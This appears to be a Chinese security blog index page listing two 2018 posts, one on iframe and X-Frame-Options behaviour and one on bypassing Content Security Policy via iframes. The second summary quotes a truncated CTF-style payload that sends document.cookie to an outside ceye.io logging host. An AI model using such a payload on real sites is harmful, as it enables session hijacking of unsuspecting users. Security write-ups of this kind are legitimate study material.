Fork me on GitHub
2018年7月12日
x-frame-options、iframe与iframe的一些操作
摘要: iframe的子操作父窗口,父操作子窗口: test.php: a.html 子操作父窗口: 父操作子: 以上是在同域下操作的,可对不同页面读写操作, 如果将iframe的srcs修改为<iframe src="http://www.123.com/csp/a.html" id="iframe">< 阅读全文
posted @ 2018-07-12 14:41 Afant1 阅读(823) 评论(0) 推荐(0)
通过iframe标签绕过csp
摘要: iframe.php代码如下: allow-popups开启时,window.open就可以打开新的窗口。 看csp规则,默认是在当前域内,如果这是一个ctf题的话,就很简单了,window.location.href='http://aa.xxxx.ceye.io?'+document.cooki 阅读全文
posted @ 2018-07-12 11:01 Afant1 阅读(3226) 评论(0) 推荐(0)